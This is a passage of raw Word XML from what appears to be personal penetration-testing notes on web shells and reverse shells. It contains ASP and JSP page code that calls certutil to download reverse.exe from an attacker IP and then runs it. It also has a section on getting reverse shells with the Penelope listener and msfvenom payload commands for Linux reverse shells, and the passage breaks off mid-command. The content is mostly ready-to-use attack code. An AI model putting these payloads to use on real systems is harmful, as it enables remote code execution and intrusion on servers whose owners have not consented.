      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F38">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here is what it might look like if we used another language other than PHP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F39">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F3A">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ASP (Classic ASP) – Windows Server:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F3B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">upload.asp – downloads reverse.exe:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F3C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F3D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;%</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F3E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Set oShell = CreateObject("WScript.Shell")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F3F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">oShell.Run "cmd /c certutil.exe -urlcache -split -f http://192.168.49.243/reverse.exe reverse.exe", 0, True</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F40">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">%&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F41">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F42">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">run.asp – executes reverse.exe:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F43">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;%</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F44">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Set oShell = CreateObject("WScript.Shell")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F45">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">oShell.Run "cmd /c reverse.exe", 0, True</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F46">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>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0F47">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F48">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F49">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F4A">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">JSP (Java Server Pages)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F4B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">upload.jsp:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F4C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;%</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F4D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    try {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F4E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">        Runtime.getRuntime().exec("certutil.exe -urlcache -split -f http://192.168.49.243/reverse.exe reverse.exe");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F4F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    } catch(Exception e) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F50">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">        out.println(e.toString());</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F51">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F52">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">%&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F53">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F54">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">run.jsp:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F55">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;%</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F56">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    try {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F57">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">        Runtime.getRuntime().exec("reverse.exe");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F58">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    } catch(Exception e) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F59">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">        out.println(e.toString());</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F5A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F5B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">%&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F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5D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F5E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F5F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_pirri5uxldvd" w:id="129"/>
      <w:bookmarkEnd w:id="129"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Getting a Reverse Shell</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F60">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F61">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">USE PENELOPE: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F62">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1025"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId318">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/brightio/penelope</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F63">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to get to Menu or exit FOR </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">penelope</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F64">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="539"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For Linux, you can do</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Fn + F12</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to get to menu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F65">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="539"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For Powershell, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Fn + F12</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> doesn't work so do </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CTRL + D</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> instead</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F66">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F67">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F68">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_rq0bjiuyhpny" w:id="130"/>
      <w:bookmarkEnd w:id="130"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MSFVENOM linux reverse shell:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F69">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F6A">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.elf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F6B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="587"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msfvenom -p </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">linux/x86/shell_reverse_tcp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> LHOST=&lt;IP&gt; LPORT=&lt;PORT&gt; -f elf &gt; shell.elf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F6C">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F6D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1490"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msfvenom -p </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cmd/unix/reverse_bash </w:t>
